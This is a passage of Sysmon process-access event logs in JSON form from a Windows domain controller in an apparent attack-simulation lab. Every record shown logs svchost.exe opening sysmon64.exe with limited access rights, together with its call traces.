06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3806,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3807,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3808,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3809,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3810,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3811,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3812,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3813,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 